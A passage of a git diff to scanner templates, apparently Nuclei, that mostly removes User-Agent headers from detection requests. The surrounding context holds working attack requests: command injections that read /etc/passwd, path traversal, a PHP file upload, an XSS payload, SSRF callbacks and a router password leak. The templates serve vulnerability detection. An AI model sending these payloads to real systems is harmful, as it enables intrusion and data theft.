'{{BaseURL}}/_all_dbs' - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + matchers-condition: and matchers: - type: word @@ -22,4 +21,4 @@ requests: - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/exposed-panels/nessus-panel.yaml b/exposed-panels/nessus-panel.yaml index 0b1a054100..8347c49d41 100644 --- a/exposed-panels/nessus-panel.yaml +++ b/exposed-panels/nessus-panel.yaml @@ -10,18 +10,19 @@ requests: - method: GET path: - "{{BaseURL}}/server/status" - headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) + matchers-condition: and matchers: - type: word words: - '{"code":200,"progress":null,"status":"ready"}' part: body + - type: word words: - 'NessusWWW' part: header + - type: status status: - 200 diff --git a/exposed-panels/prometheus-exporter-detect.yaml b/exposed-panels/prometheus-exporter-detect.yaml index b77807a555..75e9249134 100644 --- a/exposed-panels/prometheus-exporter-detect.yaml +++ b/exposed-panels/prometheus-exporter-detect.yaml @@ -11,8 +11,7 @@ requests: - method: GET path: - "{{BaseURL}}" - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + matchers-condition: and matchers: - type: word @@ -20,6 +19,7 @@ requests: - Exporter # Exporters have "Exporter" in the page title (e.g, Node Exporter, Bind Exporter and so on) - /metrics condition: and + extractors: # Extract exporter name - type: regex part: body diff --git a/exposed-panels/solarwinds-orion.yaml b/exposed-panels/solarwinds-orion.yaml index 22d351173f..e50b653a22 100644 --- a/exposed-panels/solarwinds-orion.yaml +++ b/exposed-panels/solarwinds-orion.yaml @@ -10,8 +10,7 @@ requests: - method: GET path: - "{{BaseURL}}/Orion/Login.aspx" - headers: - User-Agent: "Mozilla Firefox Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:53.0) Gecko/20100101 Firefox/53.0" + matchers: - type: word words: diff --git a/exposures/configs/ruijie-eg-password-leak.yaml b/exposures/configs/ruijie-eg-password-leak.yaml index 884592d400..2cd5c661e3 100644 --- a/exposures/configs/ruijie-eg-password-leak.yaml +++ b/exposures/configs/ruijie-eg-password-leak.yaml @@ -15,9 +15,7 @@ requests: - | POST /login.php HTTP/1.1 Host: {{Hostname}} - Content-Length: 49 Content-Type: application/x-www-form-urlencoded - X-Requested-With: XMLHttpRequest username=admin&password=admin?show+webmaster+user diff --git a/exposures/configs/ruijie-nbr1300g-cli-password-leak.yaml b/exposures/configs/ruijie-nbr1300g-cli-password-leak.yaml index 2af510fdfd..e07c091886 100644 --- a/exposures/configs/ruijie-nbr1300g-cli-password-leak.yaml +++ b/exposures/configs/ruijie-nbr1300g-cli-password-leak.yaml @@ -15,7 +15,6 @@ requests: POST /WEB_VMS/LEVEL15/ HTTP/1.1 Host: {{Hostname}} Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= - Content-Length: 111 command=show webmaster user&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant. diff --git a/exposures/logs/oracle-ebs-sqllog-disclosure.yaml b/exposures/logs/oracle-ebs-sqllog-disclosure.yaml index c98779e230..44c22c100b 100644 --- a/exposures/logs/oracle-ebs-sqllog-disclosure.yaml +++ b/exposures/logs/oracle-ebs-sqllog-disclosure.yaml @@ -11,8 +11,6 @@ requests: - method: GET path: - '{{BaseURL}}/OA_HTML/bin/sqlnet.log' - headers: - User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55" matchers-condition: and matchers: diff --git a/fuzzing/iis-shortname.yaml b/fuzzing/iis-shortname.yaml index 40ef7fe623..63669a0060 100644 --- a/fuzzing/iis-shortname.yaml +++ b/fuzzing/iis-shortname.yaml @@ -16,37 +16,25 @@ requests: GET /N0t4xist*~1*/a.aspx HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - Connection: close - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - Accept-Language: en-US,en;q=0.9 - | GET /*~1*/a.aspx' HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - Connection: close - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - Accept-Language: en-US,en;q=0.9 - | OPTIONS /N0t4xist*~1*/a.aspx HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - Connection: close - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - Accept-Language: en-US,en;q=0.9 - | OPTIONS /*~1*/a.aspx' HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - Connection: close - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - Accept-Language: en-US,en;q=0.9 req-condition: true matchers: diff --git a/fuzzing/xff-403-bypass.yaml b/fuzzing/xff-403-bypass.yaml index 694ada23cb..ea2bdc4bf0 100644 --- a/fuzzing/xff-403-bypass.yaml +++ b/fuzzing/xff-403-bypass.yaml @@ -12,30 +12,18 @@ requests: - | GET / HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 - Connection: close Accept: */* - Accept-Language: en - Accept-Encoding: gzip - | GET / HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 - Connection: close Accept: */* - Accept-Language: en - Accept-Encoding: gzip X-Forwarded-For: 127.0.0.1, 0.0.0.0, 192.168.0.1, 10.0.0.1, 172.16.0.1 - | GET /test.txt HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 - Connection: close Accept: */* - Accept-Language: en - Accept-Encoding: gzip X-Forwarded-For: 127.0.0.1, 0.0.0.0, 192.168.0.1, 10.0.0.1, 172.16.0.1 req-condition: true diff --git a/iot/targa-camera-ssrf.yaml b/iot/targa-camera-ssrf.yaml index d62c5f6c25..774cf2a690 100644 --- a/iot/targa-camera-ssrf.yaml +++ b/iot/targa-camera-ssrf.yaml @@ -13,12 +13,8 @@ requests: - | POST /cps/test_backup_server?ACTION=TEST_IP&NOCONTINUE=TRUE HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 content-type: application/json Accept: */* - Accept-Encoding: gzip, deflate - Accept-Language: en-US,en;q=0.9 - Connection: close {"test_type":"ip","test_debug":false,"ipnotify_type":"http/get","ipnotify_address":"http://{{interactsh-url}}","ipnotify_username":"","ipnotify_password":"","ipnotify_port":"0","ipnotify_content_type":"","ipnotify_template":""} diff --git a/misconfiguration/aem/aem-crx-bypass.yaml b/misconfiguration/aem/aem-crx-bypass.yaml index 31e4f967e5..a6187d442a 100644 --- a/misconfiguration/aem/aem-crx-bypass.yaml +++ b/misconfiguration/aem/aem-crx-bypass.yaml @@ -12,17 +12,13 @@ requests: - | GET /crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1 Host: {{Hostname}} - User-Agent: curl/123 Referer: {{BaseURL}} - Connection: close Accept-Encoding: gzip, deflate - | GET /content/..;/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1 Host: {{Hostname}} - User-Agent: curl/123 Referer: {{BaseURL}} - Connection: close Accept-Encoding: gzip, deflate matchers-condition: and diff --git a/misconfiguration/aem/aem-hash-querybuilder.yaml b/misconfiguration/aem/aem-hash-querybuilder.yaml index 7b6326ae47..50ae6efbd4 100644 --- a/misconfiguration/aem/aem-hash-querybuilder.yaml +++ b/misconfiguration/aem/aem-hash-querybuilder.yaml @@ -12,13 +12,9 @@ requests: - | GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate - Connection: close - Upgrade-Insecure-Requests: 1 - Cache-Control: max-age=0 matchers-condition: and matchers: diff --git a/misconfiguration/aem/aem-jcr-querybuilder.yaml b/misconfiguration/aem/aem-jcr-querybuilder.yaml index d3eafcce9e..29bc15e28f 100644 --- a/misconfiguration/aem/aem-jcr-querybuilder.yaml +++ b/misconfiguration/aem/aem-jcr-querybuilder.yaml @@ -11,13 +11,9 @@ requests: - | GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate - Connection: close - Upgrade-Insecure-Requests: 1 - Cache-Control: max-age=0 matchers-condition: and matchers: diff --git a/misconfiguration/aspx-debug-mode.yaml b/misconfiguration/aspx-debug-mode.yaml index 1879d55864..97a411ee38 100644 --- a/misconfiguration/aspx-debug-mode.yaml +++ b/misconfiguration/aspx-debug-mode.yaml @@ -13,9 +13,7 @@ requests: DEBUG /Foobar-debug.aspx HTTP/1.1 Host: {{Hostname}} Command: stop-debug - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 Content-Length: 2 matchers-condition: and diff --git a/misconfiguration/cloudflare-image-ssrf.yaml b/misconfiguration/cloudflare-image-ssrf.yaml index 53750448b2..8ab2ad1a4c 100644 --- a/misconfiguration/cloudflare-image-ssrf.yaml +++ b/misconfiguration/cloudflare-image-ssrf.yaml @@ -13,10 +13,7 @@ requests: - | GET /cdn-cgi/image/width/https://{{interactsh-url}} HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 - Connection: close Accept: */* - Accept-Language: en matchers: - type: word diff --git a/misconfiguration/iis-internal-ip-disclosure.yaml b/misconfiguration/iis-internal-ip-disclosure.yaml index ea0a55b062..100c18eaf3 100644 --- a/misconfiguration/iis-internal-ip-disclosure.yaml +++ b/misconfiguration/iis-internal-ip-disclosure.yaml @@ -12,7 +12,6 @@ requests: - |+ GET / HTTP/1.0 Host: - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0 Accept: */* unsafe: true # Use Unsafe HTTP library for malformed HTTP requests. diff --git a/misconfiguration/ssrf-via-oauth-misconfig.yaml b/misconfiguration/ssrf-via-oauth-misconfig.yaml index 5efd759888..c4c61ac7c2 100644 --- a/misconfiguration/ssrf-via-oauth-misconfig.yaml +++ b/misconfiguration/ssrf-via-oauth-misconfig.yaml @@ -14,9 +14,7 @@ requests: POST /connect/register HTTP/1.1 Host: {{Hostname}} Content-Type: application/json - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Accept-Language: en-US,en;q=0.9 - Connection: close { "application_type": "web", diff --git a/technologies/clockwork-php-page.yaml b/technologies/clockwork-php-page.yaml index 39d1765923..89ef10ba1b 100644 --- a/technologies/clockwork-php-page.yaml +++ b/technologies/clockwork-php-page.yaml @@ -9,8 +9,7 @@ requests: - method: GET path: - '{{BaseURL}}/__clockwork/app' - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + matchers-condition: and matchers: - type: status diff --git a/technologies/dell/dell-idrac6-detect.yaml b/technologies/dell/dell-idrac6-detect.yaml index fa7f636dfb..9d8bb598ff 100644 --- a/technologies/dell/dell-idrac6-detect.yaml +++ b/technologies/dell/dell-idrac6-detect.yaml @@ -7,8 +7,6 @@ info: requests: - method: GET - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 path: - "{{BaseURL}}/data?get=prodServerGen" diff --git a/technologies/dell/dell-idrac7-detect.yaml b/technologies/dell/dell-idrac7-detect.yaml index f11ad8b32e..bddc00552b 100644 --- a/technologies/dell/dell-idrac7-detect.yaml +++ b/technologies/dell/dell-idrac7-detect.yaml @@ -7,8 +7,6 @@ info: requests: - method: GET - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 path: - "{{BaseURL}}/data?get=prodServerGen" diff --git a/technologies/dell/dell-idrac8-detect.yaml b/technologies/dell/dell-idrac8-detect.yaml index bc21d228dd..e25dc371e6 100644 --- a/technologies/dell/dell-idrac8-detect.yaml +++ b/technologies/dell/dell-idrac8-detect.yaml @@ -7,8 +7,6 @@ info: requests: - method: GET - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 path: - "{{BaseURL}}/data?get=prodServerGen" diff --git a/technologies/dell/dell-idrac9-detect.yaml b/technologies/dell/dell-idrac9-detect.yaml index 94265b4d98..7677292de5 100644 --- a/technologies/dell/dell-idrac9-detect.yaml +++ b/technologies/dell/dell-idrac9-detect.yaml @@ -7,11 +7,8 @@ info: requests: - method: GET - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 path: - "{{BaseURL}}/sysmgmt/2015/bmc/info" # Firmware Version and other info (iDRAC9) - # iDRAC9 has a different endpoint than 8 and below. matchers-condition: and matchers: diff --git a/technologies/kibana-detect.yaml b/technologies/kibana-detect.yaml index 81a345b473..c35b4dd301 100644 --- a/technologies/kibana-detect.yaml +++ b/technologies/kibana-detect.yaml @@ -11,8 +11,7 @@ requests: - "{{BaseURL}}/login?next=%2F" - "{{BaseURL}}/bundles/login.bundle.js" - "{{BaseURL}}/bundles/kibana.style.css" - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + matchers: - type: word words: diff --git a/technologies/liferay-portal-detect.yaml b/technologies/liferay-portal-detect.yaml index 2620f82dc9..ebf42ab88b 100644 --- a/technologies/liferay-portal-detect.yaml +++ b/technologies/liferay-portal-detect.yaml @@ -10,8 +10,7 @@ requests: path: - '{{BaseURL}}/api/jsonws' - '{{BaseURL}}/api/jsonws/invoke' - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + matchers: - type: word words: diff --git a/technologies/pega-detect.yaml b/technologies/pega-detect.yaml index 81b02f15bc..d424da54ad 100644 --- a/technologies/pega-detect.yaml +++ b/technologies/pega-detect.yaml @@ -10,8 +10,7 @@ requests: - method: GET path: - "{{BaseURL}}/prweb/PRRestService/unauthenticatedAPI/v1/docs" - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + matchers-condition: and matchers: - type: word diff --git a/technologies/prometheus-exposed-panel.yaml b/technologies/prometheus-exposed-panel.yaml index 371360dff8..b107509968 100644 --- a/technologies/prometheus-exposed-panel.yaml +++ b/technologies/prometheus-exposed-panel.yaml @@ -8,8 +8,7 @@ requests: - method: GET path: - '{{BaseURL}}/graph' - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + matchers: - type: word words: diff --git a/vulnerabilities/apache/apache-flink-unauth-rce.yaml b/vulnerabilities/apache/apache-flink-unauth-rce.yaml index bb2304cee1..ccc8012049 100644 --- a/vulnerabilities/apache/apache-flink-unauth-rce.yaml +++ b/vulnerabilities/apache/apache-flink-unauth-rce.yaml @@ -4,7 +4,7 @@ info: name: Apache Flink Unauth RCE author: pikpikcu severity: critical - tags: apache,flink,rce + tags: apache,flink,rce,intrusive reference: - https://www.exploit-db.com/exploits/48978 - https://adamc95.medium.com/apache-flink-1-9-x-part-1-set-up-5d85fd2770f3 @@ -15,15 +15,13 @@ requests: - | POST /jars/upload HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Content-Length: 187 Content-Type: multipart/form-data;boundary=8ce4b16b22b58894aa86c421e8759df3 --8ce4b16b22b58894aa86c421e8759df3 Content-Disposition: form-data; name="jarfile";filename="poc.jar" Content-Type:application/octet-stream - nuclei + {{randstr}} --8ce4b16b22b58894aa86c421e8759df3-- matchers-condition: and diff --git a/vulnerabilities/jenkins/jenkins-stack-trace.yaml b/vulnerabilities/jenkins/jenkins-stack-trace.yaml index 8941ffc298..5807e86979 100644 --- a/vulnerabilities/jenkins/jenkins-stack-trace.yaml +++ b/vulnerabilities/jenkins/jenkins-stack-trace.yaml @@ -13,11 +13,6 @@ requests: path: - "{{BaseURL}}/adjuncts/3a890183/" - headers: - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Accept-Language: en-US,en;q=0.9,hi;q=0.8 - User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Mobile Safari/537.36 - matchers-condition: and matchers: - type: word @@ -26,6 +21,7 @@ requests: - "String index out of range" part: body condition: and + - type: status status: - 500 diff --git a/vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml b/vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml index cd7dd6cd13..0336b5eaa4 100644 --- a/vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml +++ b/vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml @@ -11,14 +11,8 @@ requests: - | POST /jolokia/ HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0. - Accept-Language: en-GB,en;q=0.5 - Accept-Encoding: gzip, deflate - Connection: close - Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded - Content-Length: 136 + { "type":"EXEC", diff --git a/vulnerabilities/oscommerce/oscommerce-rce.yaml b/vulnerabilities/oscommerce/oscommerce-rce.yaml index bbc2bcfd66..5f888337fc 100644 --- a/vulnerabilities/oscommerce/oscommerce-rce.yaml +++ b/vulnerabilities/oscommerce/oscommerce-rce.yaml @@ -13,11 +13,7 @@ requests: - | POST /install/install.php?step=4 HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: gzip, deflate Accept: */* - Connection: close - Content-Length: 95 - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Content-Type: application/x-www-form-urlencoded DIR_FS_DOCUMENT_ROOT=.%2F&DB_DATABASE=%27%29%3Bpassthru%28%27cat+%2Fetc%2Fpasswd%27%29%3B%2F%2A @@ -25,10 +21,7 @@ requests: - | GET /install/includes/configure.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) - Accept-Encoding: gzip, deflate Accept: */* - Connection: close matchers-condition: and matchers: diff --git a/vulnerabilities/other/bullwark-momentum-lfi.yaml b/vulnerabilities/other/bullwark-momentum-lfi.yaml index 6af3338d7f..96e46cec40 100644 --- a/vulnerabilities/other/bullwark-momentum-lfi.yaml +++ b/vulnerabilities/other/bullwark-momentum-lfi.yaml @@ -20,7 +20,6 @@ requests: - | GET /../../../../../../../../../../../../../etc/passwd HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 X-Requested-With: XMLHttpRequest Referer: {{Hostname}} diff --git a/vulnerabilities/other/core-chuangtian-cloud-rce.yaml b/vulnerabilities/other/core-chuangtian-cloud-rce.yaml index 8dc442db63..94cac428de 100644 --- a/vulnerabilities/other/core-chuangtian-cloud-rce.yaml +++ b/vulnerabilities/other/core-chuangtian-cloud-rce.yaml @@ -12,14 +12,10 @@ requests: - | POST /Upload/upload_file.php?l=test HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8 Accept-Encoding: gzip, deflate - Accept-Language: zh-CN,zh;q=0.9,fil;q=0.8 Cookie: think_language=zh-cn; PHPSESSID_NAMED=h9j8utbmv82cb1dcdlav1cgdf6 - Connection: close Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv - Content-Length: 183 ------WebKitFormBoundaryfcKRltGv Content-Disposition: form-data; name="file"; filename="test.php" @@ -31,7 +27,6 @@ requests: - | GET /Upload/test/test.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 req-condition: true matchers: diff --git a/vulnerabilities/other/couchdb-adminparty.yaml b/vulnerabilities/other/couchdb-adminparty.yaml index cf0c635784..a7af445594 100644 --- a/vulnerabilities/other/couchdb-adminparty.yaml +++ b/vulnerabilities/other/couchdb-adminparty.yaml @@ -11,8 +11,7 @@ requests: - method: GET path: - '{{BaseURL}}/_users/_all_docs' - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + matchers-condition: and matchers: - type: word diff --git a/vulnerabilities/other/eyou-email-rce.yaml b/vulnerabilities/other/eyou-email-rce.yaml index 9195b0191e..37cae61ecc 100644 --- a/vulnerabilities/other/eyou-email-rce.yaml +++ b/vulnerabilities/other/eyou-email-rce.yaml @@ -12,10 +12,6 @@ requests: - | POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chro·me/89.0.4389.114 Safari/537.36 - Content-Length: 25 - Cache-Control: max-age=0 - Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded type='|cat /etc/passwd||' diff --git a/vulnerabilities/other/geovision-geowebserver-xss.yaml b/vulnerabilities/other/geovision-geowebserver-xss.yaml index c5e0e08aeb..f9c3d234be 100644 --- a/vulnerabilities/other/geovision-geowebserver-xss.yaml +++ b/vulnerabilities/other/geovision-geowebserver-xss.yaml @@ -12,7 +12,6 @@ requests: - | GET /Visitor/bin/WebStrings.srf?file=&obj_name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Accept: */* matchers-condition: and diff --git a/vulnerabilities/other/gloo-unauth.yaml b/vulnerabilities/other/gloo-unauth.yaml index 4a27ed3b2d..21b04e340f 100644 --- a/vulnerabilities/other/gloo-unauth.yaml +++ b/vulnerabilities/other/gloo-unauth.yaml @@ -11,7 +11,6 @@ requests: path: - '{{BaseURL}}/fed.rpc.solo.io.GlooInstanceApi/ListClusterDetails' headers: - User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55" Content-type: "application/grpc-web+proto" Referer: "{{BaseURL}}/admin/" diff --git a/vulnerabilities/other/hashicorp-consul-rce.yaml b/vulnerabilities/other/hashicorp-consul-rce.yaml index d69e9f5708..fc90bf1e5d 100644 --- a/vulnerabilities/other/hashicorp-consul-rce.yaml +++ b/vulnerabilities/other/hashicorp-consul-rce.yaml @@ -5,17 +5,13 @@ info: author: pikpikcu severity: critical reference: https://www.exploit-db.com/exploits/46074 - tags: hashicorp,rce,oob + tags: hashicorp,rce,oob,intrusive requests: - raw: - | # Create USER PUT /v1/agent/service/register HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Connection: close - Upgrade-Insecure-Requests: 1 - Content-Length: 205 { "ID": "{{randstr}}", diff --git a/vulnerabilities/other/hasura-graphql-ssrf.yaml b/vulnerabilities/other/hasura-graphql-ssrf.yaml index f54c005b18..ab8bbe4a7a 100644 --- a/vulnerabilities/other/hasura-graphql-ssrf.yaml +++ b/vulnerabilities/other/hasura-graphql-ssrf.yaml @@ -11,13 +11,8 @@ requests: - | POST /v1/query HTTP/1.1 Host: {{Hostname}} - Content-Length: 381 - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 - content-type: application/json + Content-Type: application/json Accept: */* - Accept-Encoding: gzip, deflate - Accept-Language: en-US,en;q=0.9 - Connection: close { "type":"bulk", diff --git a/vulnerabilities/other/hiboss-rce.yaml b/vulnerabilities/other/hiboss-rce.yaml index 95572c2656..6765dc8577 100644 --- a/vulnerabilities/other/hiboss-rce.yaml +++ b/vulnerabilities/other/hiboss-rce.yaml @@ -12,16 +12,11 @@ requests: - | GET /manager/radius/server_ping.php?ip=127.0.0.1|cat%20/etc/passwd>../../poc.txt&id=1 HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Content-Length: 20 - | GET /poc.txt HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Content-Length: 20 matchers-condition: and matchers: diff --git a/vulnerabilities/other/hjtcloud-arbitrary-file-read.yaml b/vulnerabilities/other/hjtcloud-arbitrary-file-read.yaml index 89620cd0e4..a4301b8ce5 100644 --- a/vulnerabilities/other/hjtcloud-arbitrary-file-read.yaml +++ b/vulnerabilities/other/hjtcloud-arbitrary-file-read.yaml @@ -13,9 +13,7 @@ requests: POST /fileDownload?action=downloadBackupFile HTTP/1.1 Host: {{Hostname}} Accept: application/json, text/plain, */* - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Content-Length: 20 fullPath=/etc/passwd @@ -23,9 +21,7 @@ requests: POST /fileDownload?action=downloadBackupFile HTTP/1.1 Host: {{Hostname}} Accept: application/json, text/plain, */* - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Content-Length: 20 fullPath=/Windows/win.ini diff --git a/vulnerabilities/other/huawei-router-auth-bypass.yaml b/vulnerabilities/other/huawei-router-auth-bypass.yaml index 8ef99600e6..a094938e84 100644 --- a/vulnerabilities/other/huawei-router-auth-bypass.yaml +++ b/vulnerabilities/other/huawei-router-auth-bypass.yaml @@ -14,13 +14,8 @@ requests: - | GET /api/system/deviceinfo HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 Accept: application/json, text/javascript, */*; q=0.01 - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate Referer: {{BaseURL}} - X-Requested-With: XMLHttpRequest - Connection: close matchers-condition: and matchers: diff --git a/vulnerabilities/other/jeewms-lfi.yaml b/vulnerabilities/other/jeewms-lfi.yaml index 14c348eee1..a269c40da8 100644 --- a/vulnerabilities/other/jeewms-lfi.yaml +++ b/vulnerabilities/other/jeewms-lfi.yaml @@ -12,13 +12,11 @@ requests: - 